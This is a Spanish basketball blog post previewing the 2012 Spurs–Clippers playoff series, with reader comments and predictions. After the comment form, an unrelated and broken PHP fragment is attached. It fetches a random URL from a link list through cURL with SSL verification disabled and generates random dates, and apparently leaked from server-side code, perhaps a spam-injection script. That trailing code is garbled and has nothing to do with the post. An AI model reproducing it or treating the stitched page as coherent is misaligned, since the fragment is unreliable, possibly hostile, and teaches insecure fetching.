Análisis Spurs (1) – Clippers (5)

15 de May de 2012 por Viva_Dirk

Regular: 2-1

Spurs:  103.7 PF – 96.5 PC
Clippers: 97.5 PF – 95 PC

Caminos muy diferentes han recorrido ambas franquicias para llegar hasta aquí. Los Spurs llevan una temporada impecable que en la 1ª ronda ha desembocado en un 4-0 apabullante frente a los Jazz. Los años no parecen pasar para sus estrellas y las incorporaciones encajan a cada cual mejor. Por su parte, los Clippers han completado una fase regular con altibajos constantes, que se ha acabado reflejando en un 4-3 a cara de perro frente a los Grizzlies donde han tenido que tirar de armas impensables hace un par de semanas. Con todo esto muy pocos apuestan por algo que no sea una victoria de los Spurs, y en la mayoría de los casos en pocos partidos.

Claves de la eliminatoria

– Duelo en la cumbre: Chris Paul vs Tony Parker. Los mejores bases de la temporada frente a frente. Tercero y quinto respectivamente en el MVP de la temporada. Un duelo que tiene poco o nada que envidiar a los mas grandes que se nos ocurran de la liga. Paul es sin duda la pieza que mueve a todo el equipo, con él a gusto en la pista los Clippers se convierten en un equipo temible. Si los Spurs consiguen minimizarlo tienen casi todo el camino andado. Parker por su parte suele ejercer de punta de lanza en los Spurs. Sus capacidades para penetrar y para elegir la mejor opción están fuera de toda duda.

– Control del juego: Los Spurs son los mejores en este aspecto y los Clippers van a necesitar cansar las piernas más veteranas de San Antonio para tener posibilidades reales de ganar la serie. Entre otras cosas tendrían que notar que Griffin tiene 13 años menos que Duncan. El control del rebote se antoja fundamental y…

– Segunda unidad: Así llegamos a este punto. Kenyon Martin y Reggie Evans han sido fundamentales frente a los Grizzlies y en esta serie sus ‘rivales’ son Splitter y Diaw, ambos jugadores inferiores en agresividad y rebote pero que pueden superarlos en otros aspectos. También hay que ver como acaba la producción de Young&Williams en relación al seguro de vida que es Manu Ginobili.

Pronóstico

4-1 Spurs.

Comenta

4 comentarios a esta entrada

  1. Heineken dice:
    #1

    Yo pondría a Bledsoe antes que a Mo Williams, esta jugando bastante mejor y con mucha intensidad. Ojala pasasen los dos equipos jajaja, pero como solo puede llegar uno… será San Antonio 4-2

      Citar

  2. Sancho88 dice:
    #2

    Williams ha perdido bastante protagonismo con la llegada de Young. Quién lo diría, verdad? Ahora está muy competido jugar en el backourt de los Clippers, cuando hasta hace un mes o mes y algo no había esperanzas en los pequeños de Clippers. De todas formas, no creo que puedan sumar su segunda machada consecutiva, ya sería increíble. Está claro cómo va a ser la eliminatoria. Spurs intentando jugar a su ritmo alto, con anotación a más de 100 puntos y los de Vinny del Negro intentando “embarrar” los partidos y llevarlos a pocos puntos, que es como se sienten más cómodos. Aquí para mí el duelo clave va a ser Griffin vs interiores de Popovich. Parece que el físico de este señor es inagotable, pero algo le tendrá preparado tito Popo… También Clippers tienen una tarea muy dura, la de parar a Manu, Neal, Jackson… que son los que desahogan el equipo en anotación. Los exteriores de Clippers van a tener una dura tarea. No sé, creo que en el backourt la cosa está igualada, aunque Paul desequilibra todos los sistemas del rival y ahora mismo es superior a cualquier base de la liga, y en el juego interior Spurs son teóricamente superiores, con más rotación y mucho más talento, pero los Clippers intentarán reducirles gracias a su defensa espartana con Bruto y el Monstruo del Saco (esto… Reggie Evans).

    Mmmmmm… creo que puede ser la serie de MANU GINOBILI.

    4-2 es mi pronóstico

      Citar

  3. Ru dice:
    #3

    Viendo lo marrullero de CP3 y Blake Griffin,entre otras actitudes,voy con San Antonio,que creo además que están como motos.El duelo Tony Parker vs Paul es bajo mi punto de vista el mejor duelo individual de los PO’s,ni Durant vs Kobe,ni Durant vs LeBron…

      Citar

  4. GreenPride dice:
    #4

    Eliminatoria muy interesante esta que se nos plantea. A esta no llego tarde pues no he visto aún el primer partido que se jugó anoche (lo haré esta tarde).
    A priori la eliminatoria debería ser para los Spurs pero sinceramente creo que los Clips tienen alguna opción de poner las cosas difíciles.
    El duelo individual CP3-Parker puede ser de los que levanten pasiones. CP3 es sin duda la clave del juego de los Clippers. De su aportación y sobre todo de su liderazgo dependen estos Clippers para poder llevar a cabo su juego. Si es capaz de jugar a su nivel y anotar y distribuir juego serán unas series divertidas. En el otro lado Parker es un abrelatas tremendo y además pone un ritmo alto para su equipo. Para mí el ritmo es una de las principales claves de esta eliminatoria. Los Spurs tienen un banco super productivo y un ritmo alto con anotaciones altas les beneficia. Los Clippers son más limitados ofensivamente, así que deben buscar partidos más trabados, ir mucho al rebote (sobre todo al ofensivo donde creo que tienen ventaja) y evitar que las series se jueguen a la carrera. Martin-Evans-Griffin deberían hacer sufrir al juego interior de los Spurs, aunque me temo que veremos al talludito Duncan darle algunas lecciones al jovencito Griffin. Éste debería aprovechar su físico para cansar a Tim y sacarle faltas.
    La gran ventaja de los Spurs está en su experiencia y en el alma de sus exteriores. Manudo y Jackson son dos jugadores duros y experimentados ante los que será difícil que Young. Mo-Will y Bledsoe tengan tantos buenos minutos como contra los Grizzlies.
    Creo que será una serie larga pero que los Spurs van a imponer su larga plantilla y experiencia así que me lanzó por un Spurs en 6

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>